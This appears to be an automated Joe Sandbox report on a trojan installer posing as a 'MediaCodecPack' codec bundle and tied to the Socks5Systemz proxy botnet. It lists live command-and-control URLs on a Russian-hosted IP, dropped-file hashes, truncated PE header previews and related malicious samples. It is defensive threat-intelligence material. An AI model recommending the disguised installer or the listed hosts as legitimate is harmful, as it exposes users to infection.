                    https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b82a8dcd6c946851e300888c3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36211bd63489100%Avira URL Cloudmalware
                    https://188.119.66.185/h0%Avira URL Cloudsafe
                    https://188.119.66.185/allowedCert_OS_10%Avira URL Cloudsafe
                    https://188.119.66.185/mCertificates0%Avira URL Cloudsafe
                    https://188.119.66.185/z0%Avira URL Cloudsafe
                    https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4100%Avira URL Cloudmalware
                    https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058100%Avira URL Cloudmalware
                    https://188.119.66.185/v0%Avira URL Cloudsafe
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b82a8dcd6c946851e300888c3250aa15d005633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36211bd63489true
                    • Avira URL Cloud: malware
                    unknown
                    https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4ce71cc34f7f632ef3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73589d6d79058false
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.innosetup.com/Hbq580QZAR.tmp, Hbq580QZAR.tmp, 00000001.00000000.1481801382.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Hbq580QZAR.tmp.0.dr, is-TV2PJ.tmp.1.drfalse
                      high
                      https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b82a8dcd6c946851e300888c325mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://188.119.66.185/ographymediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUHbq580QZAR.exefalse
                          high
                          https://188.119.66.185/mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000003.00000002.2736393238.0000000003385000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineHbq580QZAR.exefalse
                              high
                              https://188.119.66.185/dmediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://188.119.66.185/allowedCert_OS_1mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://188.119.66.185/hmediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://188.119.66.185/p4mediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.remobjects.com/psUHbq580QZAR.exe, 00000000.00000003.1481137225.0000000002300000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.exe, 00000000.00000003.1481298794.0000000002098000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.tmp, 00000001.00000000.1481801382.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Hbq580QZAR.tmp.0.dr, is-TV2PJ.tmp.1.drfalse
                                high
                                https://188.119.66.185/priseCertificatesmediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://188.119.66.185/mCertificatesmediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://188.119.66.185/en-USmediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://188.119.66.185/zmediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://188.119.66.185/rosoftmediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://188.119.66.185/en-GBmediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://188.119.66.185/vmediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://wonderwork.ucoz.com/Hbq580QZAR.tmp, 00000001.00000002.2736047862.0000000005AEC000.00000004.00001000.00020000.00000000.sdmp, mediacodecpack.exe, 00000003.00000000.1494194059.00000000004D2000.00000002.00000001.01000000.00000009.sdmp, MediaCodecPack.exe.3.dr, is-K5SAB.tmp.1.dr, mediacodecpack.exe.1.drfalse
                                          high
                                          https://188.119.66.185/Cmediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://188.119.66.185/ai/?key=8f3f2b3ae514176a774cb0f2231e72eee7c4db7e40b92a8dcd6c946d4eb945839e7c4mediacodecpack.exe, 00000003.00000002.2736393238.000000000337D000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000003.00000002.2736393238.00000000033CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://www.remobjects.com/psHbq580QZAR.exe, 00000000.00000003.1481137225.0000000002300000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.exe, 00000000.00000003.1481298794.0000000002098000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.tmp, Hbq580QZAR.tmp, 00000001.00000000.1481801382.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Hbq580QZAR.tmp.0.dr, is-TV2PJ.tmp.1.drfalse
                                              high
                                              https://www.easycutstudio.com/support.htmlHbq580QZAR.exe, 00000000.00000003.1480741810.0000000002300000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.exe, 00000000.00000002.2734183284.0000000002091000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.exe, 00000000.00000003.1480816119.0000000002091000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.tmp, 00000001.00000002.2734658313.0000000002128000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.tmp, 00000001.00000002.2734157494.00000000005C1000.00000004.00000020.00020000.00000000.sdmp, Hbq580QZAR.tmp, 00000001.00000003.1482724370.00000000030F0000.00000004.00001000.00020000.00000000.sdmp, Hbq580QZAR.tmp, 00000001.00000003.1482802130.0000000002128000.00000004.00001000.00020000.00000000.sdmpfalse
                                                high
                                                https://188.119.66.185/Hmediacodecpack.exe, 00000003.00000002.2733859980.00000000008E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  31.214.157.206
                                                  unknownGermany
                                                  58329RACKPLACEDEfalse
                                                  188.119.66.185
                                                  unknownRussian Federation
                                                  209499FLYNETRUfalse
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1577885
                                                  Start date and time:2024-12-18 21:06:57 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 6m 34s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:9
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:Hbq580QZAR.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:015bce2662bf644e819a99d3d2b0548b.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.evad.winEXE@5/26@0/2
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 92%
                                                  • Number of executed functions: 196
                                                  • Number of non-executed functions: 294
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                  • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: Hbq580QZAR.exe
                                                  TimeTypeDescription
                                                  15:08:38API Interceptor353306x Sleep call for process: mediacodecpack.exe modified
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  31.214.157.206Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                  • 200
                                                  188.119.66.185steel.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
                                                    stories.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
                                                      basx.exeGet hashmaliciousSocks5SystemzBrowse
                                                        list.exeGet hashmaliciousSocks5SystemzBrowse
                                                          newwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
                                                            stail.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                              steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                newwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      No context
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      RACKPLACEDEOz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 31.214.157.226
                                                                      GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 31.214.157.206
                                                                      bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 31.214.157.206
                                                                      Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 31.214.157.206
                                                                      Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 31.214.157.206
                                                                      2mtt3zE6Vh.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 31.214.157.206
                                                                      7i6bUvYZ4L.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 31.214.157.206
                                                                      file.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 31.214.157.206
                                                                      imMQqf6YWk.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 31.214.157.206
                                                                      imMQqf6YWk.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 31.214.157.206
                                                                      FLYNETRUsteel.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      stories.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      basx.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      list.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      newwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      stail.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      newwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      51c64c77e60f3980eea90869b68c58a8steel.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      stories.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      basx.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      list.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      newwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      stail.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      newwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      • 188.119.66.185
                                                                      cd#U9988.exeGet hashmaliciousUnknownBrowse
                                                                      • 188.119.66.185
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      C:\ProgramData\MediaCodecPack\sqlite3.dllsteel.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
                                                                        stories.exe.2.exeGet hashmaliciousSocks5SystemzBrowse
                                                                          basx.exeGet hashmaliciousSocks5SystemzBrowse
                                                                            list.exeGet hashmaliciousSocks5SystemzBrowse
                                                                              newwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                stail.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                  steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                    newwork.exe.1.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                      steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                        AbC0LBkVhr.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                          Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3306150
                                                                                          Entropy (8bit):6.383118190067132
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:1JMOsl+1vp+rdZ72dLFGhFLQFpWVIvk3O/:1GLc1vp+rdp2vGhFLmvkm
                                                                                          MD5:ADAB835347D3F69415F7ED6C10C13B85
                                                                                          SHA1:540F6CCD18A0896D96FC711A0DD4C27F6C2E7403
                                                                                          SHA-256:3073D7435C4ECB43BA08C28D1238A05853379815C2F967575DEB6DF43937A1AC
                                                                                          SHA-512:067EFBF5E8A092C73F852A15A9E950D992D6018F08285481162310712F74169DE61BB14DC6A133681484CBAA6C6E7CDF0E54BA411737F3A901FB0BBFEA768F4C
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Reputation:low
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L...F.bg.................j...D.......#............@...........................2.....B.3.....................................4........ .................................................................................\............................aitt4...h.......j.................. ..`.ajtt4...-...........n..............@..@.aktt4...d.......0..................@....rsrc........ ......................@..@.altt4.... ....... ..|..............`./.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):645592
                                                                                          Entropy (8bit):6.50414583238337
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                          MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                          SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                          SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                          SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: steel.exe.2.exe, Detection: malicious, Browse
                                                                                          • Filename: stories.exe.2.exe, Detection: malicious, Browse
                                                                                          • Filename: basx.exe, Detection: malicious, Browse
                                                                                          • Filename: list.exe, Detection: malicious, Browse
                                                                                          • Filename: newwork.exe.1.exe, Detection: malicious, Browse
                                                                                          • Filename: stail.exe.3.exe, Detection: malicious, Browse
                                                                                          • Filename: steel.exe.3.exe, Detection: malicious, Browse
                                                                                          • Filename: newwork.exe.1.exe, Detection: malicious, Browse
                                                                                          • Filename: steel.exe.3.exe, Detection: malicious, Browse
                                                                                          • Filename: AbC0LBkVhr.exe, Detection: malicious, Browse
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                          Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          File Type:ISO-8859 text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8
                                                                                          Entropy (8bit):2.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:nP/l:l
                                                                                          MD5:C337052FD7E70F9F7B4215130969A8E2
                                                                                          SHA1:68C67B8E77F679E1CE8365015F11516B6B9FCB89
                                                                                          SHA-256:99B1C2D9E514AD6052A9A12DE9B055AF9C15E966CBE5402D3961BF64A74FE966
                                                                                          SHA-512:81B30784E9C539E55512502E949E8FED7BC558E77BC11F87175DF8566C4E0E4EBC469F1CF274BBD865220D384BE03F0EF07D2224D2534D0BE14843BB2C7DC3D3
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:.+cg....
                                                                                          Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):4
                                                                                          Entropy (8bit):0.8112781244591328
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:2B197A84C60EC779B10736BB6475B5E9
                                                                                          SHA1:C66F455EC1C14E38154F75BAF37ADD2E728EE0C1
                                                                                          SHA-256:0623CCB9B1619BD388284A438034D8CB6431964BA727D8B1C450303105735488
                                                                                          SHA-512:702414B61E87C6FFBB92A6B3B2E240639B6878560C62051FE641135A9352ED14A64CA844A641F5E330798E074DEEE8C52E0E721F16CCB37C000B3411CABD2060
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:....
                                                                                          Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):128
                                                                                          Entropy (8bit):2.9012093522336393
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ObXXXd0AbDBdUBWetxt:Or9Lb3UFx
                                                                                          MD5:679DD163372163CD8FFC24E3C9E758B3
                                                                                          SHA1:F307C14CA65810C8D0238B89B49B2ACD7C5B233B
                                                                                          SHA-256:510EA89D00FA427C33BD67AEEA60D21066976F085959C2AFE1F69411A8CA722D
                                                                                          SHA-512:46C464F15BCE39E28DCD48AF36C424845631D2B48D7E37D7FBBBEE0BC4DF32445A2810E397BF29FCA76C0364B1AA30CC05DCF4D9E799C6C697B49A174560969C
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview:12b48997735ce8b4537cf99be74bb62f518d3799011c89eb7c719048e83fac56................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1645320
                                                                                          Entropy (8bit):6.787752063353702
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                                          MD5:871C903A90C45CA08A9D42803916C3F7
                                                                                          SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                                          SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                                          SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:MS Windows HtmlHelp Data
                                                                                          Category:dropped
                                                                                          Size (bytes):78183
                                                                                          Entropy (8bit):7.692742945771669
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                          MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                          SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                          SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                          SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                          Malicious:false
                                                                                          Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):348160
                                                                                          Entropy (8bit):6.542655141037356
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                          MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                          SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                          SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                          SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):645592
                                                                                          Entropy (8bit):6.50414583238337
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                          MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                          SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                          SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                          SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-LO4AE.tmp\Hbq580QZAR.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):499712
                                                                                          Entropy (8bit):6.414789978441117
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                          MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                          SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                          SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                          SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
